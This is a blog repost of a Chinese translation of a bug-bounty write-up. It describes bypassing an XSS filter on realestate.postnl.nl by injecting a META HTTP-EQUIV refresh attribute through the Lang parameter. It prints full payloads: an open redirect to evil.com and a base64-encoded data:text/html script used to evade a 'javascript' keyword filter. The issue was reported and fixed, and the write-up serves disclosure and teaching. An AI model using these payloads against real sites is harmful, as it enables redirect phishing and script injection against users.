在realestate.postnl.nl中使用META标签绕过xss过滤器

经验分享 master 来源:先知社区 10个月前 (11-26) 75次浏览 已收录 0个评论 扫描二维码

翻译自:https://medium.com/@prial261/xss-bypass-using-meta-tag-in-realestate-postnl-nl-32db25db7308
翻译:聂心明

今天我准备将一个xss漏洞报给 postnl.nl 的src

漏洞点:http://realestate.postnl.nl/?Lang=
我使用“><xsstest> 测试Lang参数是否有xss,然后在源码中我发现我输入的参数被输出到META标签之中了,就像下面这样 :

<meta name="language" content=""><xsstest>" />

看起来很简单对吧?但是等一下,我输入"><img src=x> 我得到:
在realestate.postnl.nl中使用META标签绕过xss过滤器

我尝试了很多HTML标签,然后我总结了两点:

  • 所有的有效的HTML都不被允许
  • 我能创建任何属性

所以我谷歌寻找meta标签属性,得到:
在realestate.postnl.nl中使用META标签绕过xss过滤器

http-equiv属性引起我的注意。现在我又谷歌希望能了解到更多的东西

META标签有一个http-equiv属性,这个属性允许你在HTML代码中定义HTTP头的等效项。http-equiv属性会使用refresh这个值,这个值的可以被用来跳转到其他页面。
然后我输入0;http://evil.com"HTTP-EQUIV="refresh" 页面显示:

<meta name="language" content="0;http://evil.com"HTTP-EQUIV="refresh"" />

然后跳转到了evil.com,所以我已经能够跳转了。现在我试着构造URI XSS,所以我输入0;javascript:alert(1)"HTTP-EQUIV="refresh" 页面报
在realestate.postnl.nl中使用META标签绕过xss过滤器
我的payload中触发了javascript关键字。所以我使用Base64编码一下payload。0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh",然后返回的源码是:

<meta name="language" content="0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh"" />

现在我访问:http://realestate.postnl.nl/?Lang=0%3Bdata%3Atext%2fhtml%3Bbase64%2CPHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg%3D%3D%22HTTP-EQUIV%3D%22refresh%22就可以xss了
在realestate.postnl.nl中使用META标签绕过xss过滤器

我把漏洞报告给了官方Zerocopter 。然后厂商通过把data:text/html;base64加入黑名单的方式修复了此漏洞,这种方式就像把javascript加入黑名单一样,但是我依然可以通过访问http://realestate.postnl.nl/?Lang=0%3Bhttp%3A%2f%2fevil.com%22HTTP-EQUIV%3D%22refresh%22 来达到任意跳转的目的。

在realestate.postnl.nl中使用META标签绕过xss过滤器

官方又一次修复了这个漏洞,并且把我的名字放在了名人堂 页面上,并且将会给我发一些礼物
在realestate.postnl.nl中使用META标签绕过xss过滤器

谢谢你们阅读
喜欢我的话请在我的推特上关注我: https://twitter.com/prial261
如果你们有任何问题,欢迎在Facebook上向我提问
https://www.facebook.com/prial261


Xss.lc私人博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:在realestate.postnl.nl中使用META标签绕过xss过滤器
喜欢 (0)
master
关于作者:
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址